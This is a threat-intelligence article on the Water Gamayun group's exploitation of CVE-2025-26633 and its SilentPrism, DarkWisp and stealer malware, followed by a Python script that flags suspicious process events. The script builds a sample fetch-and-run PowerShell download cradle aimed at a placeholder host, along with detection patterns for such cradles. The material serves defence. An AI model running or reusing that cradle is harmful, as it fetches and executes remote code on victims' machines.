
Russian Hackers Leverage CVE-2025-26633 Through MSC EvilTwin to Deploy SilentPrism and DarkWisp

Threat Actor Water Gamayun Deploys New Malware After Microsoft Windows Zero-Day Exploitation

Recent analysis has uncovered the activities of a notorious hacking group known as Water Gamayun, which is suspected of being linked to Russian cyber-operations. The group has been implicated in the exploitation of a crucial security vulnerability in Microsoft Windows, specifically targeting the Microsoft Management Console (MMC) framework with a zero-day vulnerability identified as CVE-2025-26633, also referred to as MSC EvilTwin. They have deployed two new backdoors, SilentPrism and DarkWisp, that represent a significant threat in the cybersecurity landscape.

Researchers from Trend Micro, namely Aliakbar Zahravi and Ahmed Mohamed Ibrahim, provided an in-depth analysis of the group’s tactics. They highlighted the use of malicious provisioning packages, as well as signed .msi files, to deliver these new malware variants. A notable technique employed is the execution of commands via the IntelliJ runnerw.exe, which allows the hackers to execute payloads covertly.

Water Gamayun’s recent activity comes after the group gained notoriety in late June 2024 for using a GitHub repository named "encrypthub" to distribute various malware families, such as stealers, miners, and ransomware. Their operational methods have evolved as they have transitioned to their own infrastructure for both staging purposes and command-and-control functions.

The attack chains initiated by Water Gamayun utilize multiple vectors, including provisioning packages (.ppkg), signed Microsoft Windows Installer files (.msi), and .msc files. This multifaceted approach enables them to install information-stealing malware and backdoors, which possess the capability for both persistence and data theft. The .msi installers masquerade as legitimate communication and meeting software, including popular platforms such as DingTalk, QQTalk, and VooV Meeting. These disguise tactics serve as a means to execute a PowerShell downloader that fetches and runs subsequent payloads on compromised systems.

The SilentPrism backdoor establishes persistence on infected machines, allowing its operators to execute several shell commands simultaneously. It also integrates anti-analysis techniques that enhance its evasion of detection. In parallel, DarkWisp enables reconnaissance of the system, the exfiltration of sensitive data, and the establishment of persistent connections to the command-and-control server.

Upon initiating contact with the C&C infrastructure, the malware enters a continuous interaction loop in which it waits for command instructions. This communication takes place over a TCP connection on port 8080, using a command format in which the commands themselves are base64-encoded. The malware's ability to maintain ongoing connectivity and transmit results back to the operators underscores its sophisticated design.

Additionally, the operation deploys the MSC EvilTwin loader, designed to exploit the aforementioned CVE-2025-26633. This loader executes a malicious .msc file, subsequently leading to the deployment of the Rhadamanthys Stealer. The cleaning mechanisms incorporated within this loader help to eliminate traces, thereby complicating forensic analysis of the infection.

Rhadamanthys is just one of many stealers in Water Gamayun’s arsenal, as the group has also delivered another stealer called StealC, in addition to three variants of their bespoke PowerShell stealer. These variants are characterized by their capability to collect detailed system information, including antivirus details, installed software, network configurations, and running applications. They have also been observed extracting Wi-Fi passwords, Windows product keys, clipboard histories, and credentials from various messaging, VPN, FTP, and password management applications. The malware is particularly tailored to target files associated with cryptocurrency wallets, indicating a focused intent on gathering sensitive financial information.

Researchers have noted the similarities in functionalities across the EncryptHub variants, which are modified versions of the open-source Kematian Stealer. Notably, one variant stands out due to its methodology of employing a living-off-the-land binary (LOLBin) technique, utilizing the IntelliJ process launcher to indirectly execute remote PowerShell scripts on compromised systems.

The artifacts of this stealer, delivered through malicious .msi packages or binary dropper malware, have also been seen propagating additional malware families, including Lumma Stealer and Amadey, as well as clipping tools.

Further investigation into Water Gamayun’s command-and-control infrastructure revealed their use of PowerShell scripts to download AnyDesk software, enabling remote access. This flexibility allows operators to send base64-encoded commands to victim machines, showcasing the intricate complexity of their operations.
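The behaviours described above lend themselves to straightforward detection logic. The following Python script is an added illustration, not code from the Trend Micro analysis or this article: it checks constructed process-creation events for runnerw.exe spawning PowerShell, for base64-encoded PowerShell commands that decode to a download cradle, and for mmc.exe loading a .msc file from a user-writable location. The event format, file paths and the URL in the sample are assumptions made for the example.

```python
import base64
import re

# Constructed sample: an encoded PowerShell download cradle of the kind the
# article describes (the URL is a placeholder, not a real indicator).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/p')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events (parent image + child command line).
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\JetBrains\IntelliJ IDEA\bin\runnerw.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -Command Get-Date"},
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\mmc.exe" "C:\Users\alice\AppData\Local\Temp\update.msc"'},
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\mmc.exe" C:\Windows\System32\services.msc'},
]

ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
DOWNLOAD_CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I)
# Assumed set of user-writable locations; extend to match local policy.
USER_WRITABLE = re.compile(r"\\(Users\\[^\\]+\\(AppData|Downloads|Desktop)|Temp|ProgramData)\\", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None


def analyse_event(ev):
    """Return a list of human-readable findings for one process-creation event."""
    findings = []
    parent, cmd = ev["parent"].lower(), ev["cmdline"]
    if parent.endswith("runnerw.exe") and "powershell" in cmd.lower():
        findings.append("runnerw.exe (IntelliJ) spawning PowerShell")
    decoded = decode_encoded_command(cmd)
    if decoded and DOWNLOAD_CRADLE.search(decoded):
        findings.append("encoded PowerShell containing download cradle")
    if "mmc.exe" in cmd.lower() and ".msc" in cmd.lower() and USER_WRITABLE.search(cmd):
        findings.append("mmc.exe loading .msc from user-writable path")
    return findings


if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        print(i, analyse_event(ev))
```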

Overall, Water Gamayun’s adaptability in employing various methods to compromise systems underscores the evolving nature of cyber threats faced by individuals and organizations alike. Their extensive malware arsenal and sophisticated command-and-control capabilities present significant challenges in the realm of cybersecurity. In light of these developments, continuous surveillance and advanced defensive strategies remain imperative for countering such increasingly sophisticated cyber threats.